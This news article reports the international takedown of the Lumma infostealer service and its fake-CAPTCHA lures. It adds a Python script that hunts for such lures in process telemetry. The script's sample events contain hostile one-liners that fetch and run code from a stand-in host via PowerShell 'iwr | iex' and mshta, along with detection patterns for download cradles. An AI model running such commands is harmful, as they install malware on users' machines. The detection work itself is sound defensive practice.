
Microsoft and Global Agencies Dismantle Infostealer ‘Lumma’ in Major Cybercrime Crackdown

In an international crackdown on cybercrime, Microsoft has joined forces with global law enforcement agencies to dismantle Lumma (also known as Lumma Stealer), a notorious information-stealing malware service linked to password theft, ransomware attacks, and cryptocurrency heists. The operation, led by Microsoft’s Digital Crimes Unit (DCU) alongside Europol, the U.S. Justice Department, and Japan’s Cybercrime Control Center, resulted in the seizure of approximately 2,300 domains central to Lumma’s command-and-control infrastructure.

Lumma, which first emerged on Russian-speaking dark web markets in 2022, was sold as malware-as-a-service: a modular, customizable package offered in tiers priced from $250 to $20,000, according to cybersecurity firm ESET. Its versatility and ease of use made it the commodity malware of choice for cybercriminals who wanted to tailor their attacks with add-on tools and manage stolen credentials, cookies and wallet data through online dashboards.

A Global Dragnet on the Dark Web

The takedown comes amid a growing surge in ransomware attacks, which have reportedly risen by 300% over the past decade, according to Microsoft. In a blog post, Steven Masada, Assistant General Counsel at Microsoft’s DCU, described Lumma as a powerful enabler for hackers, capable of facilitating identity theft, brand impersonation, and large-scale data breaches.

Microsoft revealed that nearly 400,000 Windows machines worldwide had been infected with Lumma in the two months before the takedown alone. The malware was implicated in a number of high-profile cyber incidents, including the 2023 breach of Schneider Electric SE, and a spoofing campaign targeting CrowdStrike Holdings Inc. that distributed malware disguised as a cleanup tool in the wake of CrowdStrike’s own faulty software update.

From Booking.com Scams to Fake CAPTCHA Traps

The Lumma tool’s flexibility allowed attackers to mimic reputable brands, luring victims into clicking malicious links. One campaign impersonated Booking.com, sending fraudulent messages that led recipients to download malware under the guise of legitimate travel confirmations.

In a more technical lure, Lumma operators used fake CAPTCHA verification pages that instructed visitors to “prove they are human” by copying a command (silently placed on the clipboard by the page) and running it themselves, typically through the Windows Run dialog. Because the victim launches the installer by hand, there is no downloaded file for browser or mail filters to block. This blend of social engineering and technical deception made it especially dangerous to both individuals and enterprise systems.
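Defenders can hunt for the execution chain this lure produces rather than for the lure itself. The script below is an added example for this article, not code from Microsoft or from the article’s sources. It assumes process-creation telemetry (for instance Sysmon Event ID 1) is available as records with ParentImage, Image, CommandLine and User fields, and flags a script host launched from the shell (the parent of a Run-dialog launch is explorer.exe) whose command line fetches or decodes a second stage. The sample events, hosts and URLs are constructed for the example and do not come from any real Lumma campaign.

```python
"""Flag ClickFix-style 'fake CAPTCHA' execution chains in process telemetry.

Added example; not the article's or Microsoft's code. Assumes process-creation
events are dicts with ParentImage, Image, CommandLine and User. The events in
SAMPLE_EVENTS are constructed, including the 203.0.113.10 address.
"""
import re

# Binaries a victim is typically told to launch from the Win+R Run dialog.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

# Command-line fragments that fetch, decode or evaluate a second stage.
REMOTE_FETCH = re.compile(
    r"https?://|\biwr\b|invoke-webrequest|downloadstring|downloadfile|"
    r"\biex\b|invoke-expression|-enc(odedcommand)?\b|frombase64string",
    re.IGNORECASE,
)
# Lure one-liners usually hide the console so the victim sees nothing.
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)

# Constructed sample events (assumed field names, not real captures).
SAMPLE_EVENTS = [
    {   # benign: an admin opens an interactive PowerShell from the shell
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe", "User": "CORP\\alice"},
    {   # lure: hidden window, remote download piped straight into iex
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://203.0.113.10/verify.txt | iex"',
        "User": "CORP\\bob"},
    {   # lure: mshta pulling a remote HTA from the Run dialog
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta https://203.0.113.10/captcha.hta", "User": "CORP\\carol"},
    {   # benign: a scheduled task runs a maintenance script (parent is not explorer)
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\Scripts\cleanup.ps1", "User": "NT AUTHORITY\\SYSTEM"},
]


def basename(path: str) -> str:
    """Return the file name of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> int:
    """Return a 0-3 suspicion score for one process-creation event.

    1: a script host spawned directly by explorer.exe (Run dialog / shell)
    +1: the command line fetches, decodes or evaluates remote content
    +1: the command line hides its window
    """
    if basename(ev["ParentImage"]) != "explorer.exe":
        return 0
    if basename(ev["Image"]) not in SCRIPT_HOSTS:
        return 0
    score = 1
    cmd = ev["CommandLine"]
    if REMOTE_FETCH.search(cmd):
        score += 1
    if HIDDEN_WINDOW.search(cmd):
        score += 1
    return score


def find_clickfix(events: list, threshold: int = 2) -> list:
    """Return alert records for events scoring at or above threshold."""
    alerts = []
    for ev in events:
        s = score_event(ev)
        if s >= threshold:
            alerts.append({"user": ev["User"], "image": basename(ev["Image"]),
                           "score": s, "command": ev["CommandLine"]})
    return alerts


if __name__ == "__main__":
    for alert in find_clickfix(SAMPLE_EVENTS):
        print(f"[score {alert['score']}] {alert['user']} ran {alert['image']}: {alert['command']}")
```

An interactive PowerShell opened from the Start menu scores 1 and stays below the default threshold, so the rule keys on the combination (shell parent plus remote fetch or hidden window) rather than on any one binary. In a real deployment the same logic can be expressed as a Sigma or EDR query, and correlating with the RunMRU registry key gives a second, independent signal that the Run dialog was used.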

Global Enforcement Tightens Its Grip

The crackdown on Lumma is part of a wider pattern of aggressive international efforts to dismantle dark web cybercrime infrastructure. In April, more than 30 DDoS-for-hire websites were shut down, and earlier this year Europol led the takedown of Cracked and Nulled, two prominent hacking forums with more than 10 million users combined, where cyber tools and stolen data were bought and sold.

The Justice Department has also been targeting underground markets where malware like Lumma is sold, while Europol and Japanese authorities have moved to isolate and neutralize associated threat actors.

An Ongoing Battle

Although Microsoft and its partners have scored a major victory with the Lumma takedown, the fight against ransomware and dark web-enabled attacks is far from over; malware-as-a-service operators routinely attempt to rebuild on fresh infrastructure. As Masada noted, efforts to block the use of these tools in brand impersonation and financial fraud remain a top priority.

The tech giant’s collaborative effort signals a growing recognition that cross-border cybercrime requires cross-border solutions—and that the tech industry has a pivotal role to play in safeguarding users from the evolving threat landscape.
